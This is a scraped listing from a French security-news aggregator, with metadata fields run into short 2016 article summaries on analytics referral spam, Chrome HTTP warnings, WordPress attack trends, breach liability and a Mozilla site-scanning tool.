www.secnews.physaphae.fr/article.php?IdArticle=282809 False None APT 15 None Bleeping Computer - Magazine Américain 2016-11-21T16:35:08+00:00 http://www.bleepingcomputer.com/news/security/russian-spammer-uses-fake-google-domain-to-tell-webmasters-to-vote-trump/ www.secnews.physaphae.fr/article.php?IdArticle=257879 False None APT 19 None Network World - Magazine Info To read this article in full or to leave a comment, please click here]]> 2016-11-15T07:50:00+00:00 http://www.networkworld.com/article/3141930/security/goodbye-nac-hello-software-defined-perimeter-sdp.html#tk.rss_security www.secnews.physaphae.fr/article.php?IdArticle=254472 False None APT 15 None Hacker Republic - Site de news Hack fr SpamBotsBlack SEOSurveiller ses logs, c'est bien mais regarder ce qui se passe du côté de ses statistiques de fréquentation, c'est mieux. En faisant un tour sur mon Google Analytics, j'ai eu l'immense surprise de voir ceci dans la catégorie langue : En faisant une recherche rapide, j'ai découvert qu'il s'agissait d'une variété de spam : le spam analytics. Le spam analytics : pourquoi ? Cette technique, que je classe dans la section Black SEO, peut aussi – comme le spam traditionnel – être vectrice de malware. Dans le cas illustré ici, il s'agissait surtout d'une campagne électorale. L'idée générale est de pourrir les rapports analytics des webmasters, community managers, développeurs, etc. pour les inciter à visiter des sites et voir dans quel contexte on parle de leur application Web. Il peut aussi s'agir de générer du trafic vers ses sites. En effet, certains portails laissent publics leurs backlinks et leurs référents, améliorant du même coup les backlinks-spammeurs et donc leur notoriété et donc leur rang dans les résultats de recherche. C'est ce qu'on appelle du spamindexing. En résumé, le spam analytics sert à : Générer un faux trafic ; Propager des malwares ; Faire grimper sa propre notoriété. On a vu le pourquoi, passons au comment. Comment fonctionne le spam analytics ? En matière de spam analytics, il y a deux techniques : Le bot Referral Spam ; Le Ghost Referral Spam. Comme son nom l'indique, le premier est un robot qui va effectivement visiter votre site, donc générer du trafic. Cette technique est simple et tout le monde sait le faire. Le second est un peu plus vicieux car il ne concerne que les sites fonctionnant avec Google Analytics, il ne visite pas votre site mais il laisse quand même une empreinte dans vos statistiques, soit par faux référents, par faux langages ou par faux mots-clefs. Mais alors, comment peut-on polluer des statistiques en ne visitant pas un site Web ? En utilisant une petite " faille " de Google Analytics, qui en réalité une fonctionnalité, faisant ainsi une démonstration remarquable de la phrase " it's not a bug, it's a feature ". On commence par générer des codes Google Analytics. On envoie ensuite de fausses données grâce au protocole de mesure de Google Analytics et ces fausses données sont ensuite enregistrées dans les statistiques des comptes ciblés.]]> 2016-11-15T00:49:31+00:00 https://www.hackersrepublic.org/outils/le-spam-analytics www.secnews.physaphae.fr/article.php?IdArticle=282813 False None APT 19 None Network World - Magazine Info I was hit last week. Forensics are in progress. I got doxxed, too.It has made me realize that most of systems security is an illusion. Here are my favorite alternate realities:1. Everything is safe behind the firewall.Ever heard of UBFWI-as in User's Been Fooling With It? While IPD/IPS and firewall networked-technology has improved so vastly, there's nothing like a user with an infected laptop to bring in a lulu.2. Obscure operating systems never get hit. Hackers only go for the gold with Windows.Here, let me laugh out loud and roll on the floor. Mine was an obscure server version on an obscure branch of an obscure BSD limb. Listen to the sound of lunch getting eaten: mine. Chomp, chomp, burp.To read this article in full or to leave a comment, please click here]]> 2016-11-14T11:12:00+00:00 http://www.networkworld.com/article/3141431/security/your-security-mirages.html#tk.rss_security www.secnews.physaphae.fr/article.php?IdArticle=253515 False None APT 15 None Network World - Magazine Info To read this article in full or to leave a comment, please click here]]> 2016-11-10T11:03:00+00:00 http://www.networkworld.com/article/3138891/internet/google-punishes-web-backsliders-in-chrome.html#tk.rss_security www.secnews.physaphae.fr/article.php?IdArticle=251917 False None APT 19 None The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) ]]> 2016-11-02T03:21:37+00:00 http://feedproxy.google.com/~r/TheHackersNews/~3/DEo5yJss7-Y/memcached-hacking.html www.secnews.physaphae.fr/article.php?IdArticle=242973 False None APT 19 None Network World - Magazine Info writer and lawyer, brought an interesting turn of events to my attention last week. We need to pay heed: A litigant can have standing in a U.S. Federal breach case where no personal fraud or identity theft has yet occurred.Usually, a litigant has to have suffered injury-a breech caused them identity theft or other fraudulent activity based upon information released in a security breach. This means if you're cracked, you can be liable if personally identifiable information is released, exfiltrated, absconded, whatever. It also means that should you believe the axiom that currently most of us are hacked, we're in for a litigious treat. To read this article in full or to leave a comment, please click here]]> 2016-10-11T04:00:00+00:00 http://www.networkworld.com/article/3128859/security/a-breach-alone-means-liability.html#tk.rss_security www.secnews.physaphae.fr/article.php?IdArticle=190204 False None APT 17 None UnderNews - Site de news "pirate" francais La firme de sécurité Sucuri vient de publier le Website Hacked Trend Report pour le deuxième trimestre de 2016, en mettant en évidence l'impressionnant palmarès du CMS WordPress. Bien entendu, c'est la faute à la négligence des webmasters et non du système en lui-même...]]> 2016-09-28T08:16:27+00:00 http://feedproxy.google.com/~r/undernews/oCmA/~3/zmAsGTv4q5g/wordpress-remporte-la-palme-du-cms-le-plus-vise-par-les-cyberattaques.html www.secnews.physaphae.fr/article.php?IdArticle=137848 False None APT 19 None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Part 1 - we looked at Inventory of Authorized and Unauthorized Devices. Part 2 - we looked at Inventory of Authorized and Unauthorized Software. Part 3 - we looked at Secure Configurations. Part 4 - we looked at Continuous Vulnerability Assessment and Remediation. Part 5 - we looked at Malware Defenses. Part 6 - we looked at Application Security. Part 7 - we looked at Wireless Access Control. Part 8/9 – we looked at Data Recovery and Security Training. Part 10/11 - we looked at Secure Configurations for Network Devices such as Firewalls, Routers, and Switches and Limitation and Control of Network Ports, Protocols and Services. Part 12 - we looked at Controlled Use of Administrative Privileges Part 13 - we looked at Boundary Defense Part 14 - we looked at Maintenance, Monitoring and Analysis of Audit Logs Part 15 - We looked at Controlled Access Based on the Need to Know. ]]> 2016-09-13T13:00:00+00:00 http://feeds.feedblitz.com/~/196176696/0/alienvault-blogs~Free-and-Commercial-Tools-to-Implement-the-Center-for-Internet-Security-CIS-Security-Controls-Part-Data-Protection www.secnews.physaphae.fr/article.php?IdArticle=59479 False None APT 17 None UnderNews - Site de news "pirate" francais Google Chrome affiche actuellement une icône informative grise sur les sites HTTP. Mais le géant explique sur son blog qu'à partir du début 2017, son navigateur avertira les utilisateurs qui se trouvent sur une page non protégée par HTTPS. Lorsqu'une alerte s'affichera pour tous les visiteurs d'un site, cela pourra être considéré comme un important moyen de pression pour forcer les webmasters à passer leur site en HTTPS.]]> 2016-09-11T10:43:41+00:00 http://feedproxy.google.com/~r/undernews/oCmA/~3/d-pJWrduC-g/google-chrome-vers-une-signalisation-des-pages-http-non-securisees.html www.secnews.physaphae.fr/article.php?IdArticle=47810 False None APT 19 None Network World - Magazine Info Dubbed Observatory, the tool was initially built for in-house use by Mozilla security engineer April King, who was then encouraged to expand it and make it available to the whole world.She took inspiration from the SSL Server Test from Qualys' SSL Labs, a widely appreciated scanner that rates a website's SSL/TLS configuration and highlights potential weaknesses. Like Qualys' scanner, Observatory uses a scoring system from 0 to 100 -- with the possibility of extra bonus points -- which translates into grades from F to A+.To read this article in full or to leave a comment, please click here]]> 2016-08-26T08:14:40+00:00 http://www.networkworld.com/article/3112331/mozilla-launches-free-website-security-scanning-service.html#tk.rss_security www.secnews.physaphae.fr/article.php?IdArticle=8971 False None APT 19 None